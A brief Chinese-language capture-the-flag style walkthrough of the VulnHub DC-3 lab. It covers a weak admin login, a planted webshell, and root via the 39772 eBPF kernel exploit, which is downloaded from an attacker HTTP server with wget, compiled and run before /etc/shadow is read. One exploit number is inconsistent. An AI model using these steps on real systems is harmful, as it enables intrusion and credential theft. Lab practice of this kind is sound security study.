靶場地址

https://download.vulnhub.com/dc/DC-3-2.zip

打開DC-3

?使用kali掃描獲取靶場ip

?目錄掃描獲取后臺地址

弱口令admin/snoopy進入后臺

此處可寫入一句話木馬

創建文件寫入一句話木馬

哥斯拉上線

使用lsb_release -a命令查看內核版本

方法一?

使用ubuntu漏洞庫發現該內核版本為4.4.x，通過漏洞庫搜索有無exp

使用39772.txt的exp提權

cat /usr/share/exploitdb/exploits/linux/local/39772.txt
#提取并復制特定漏洞利用代碼到當前目錄
searchsploit -m 38772.txt

在文本中提到了exp的下載鏈接

下載exp并開啟http服務

靶機下載exp

在靶機上下載、解壓、編譯、執行

wget http://192.168.5.134:8000/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploif.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
whoami
cat /etc/shadow